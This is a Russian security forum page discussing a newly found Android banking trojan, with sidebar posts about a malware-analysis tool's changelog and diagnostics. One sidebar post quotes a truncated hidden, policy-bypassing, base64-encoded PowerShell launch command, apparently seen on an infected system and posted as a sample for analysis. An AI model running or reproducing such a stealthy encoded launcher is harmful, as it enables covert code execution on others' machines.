Перейти к содержанию
Viktor

Эксперты «Лаборатории Касперского» обнаружили нового троянца для Android

Recommended Posts

Viktor

Специалисты обнаружили принципиально новую схему работы мобильных зловредов, позволяющую злоумышленникам быстро и незаметно украсть у ничего не подозревающей жертвы значительную сумму денег.

Читать далее

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
REVERSE

Такое поведение троянца позволяет предположить, что следующим шагом будет перевод любой доступной в «Мобильном банке» суммы на мобильный номер злоумышленников.
То есть, пока такого поведения нет? Пока только проверяют, выгодно ли такое?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Илья Рабинович

А в чём состоит новизна кражи денег через мобильные банки? По-моему, принципиальные прототипы такого уже проскальзывали на конференциях по ИБ, я не прав?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×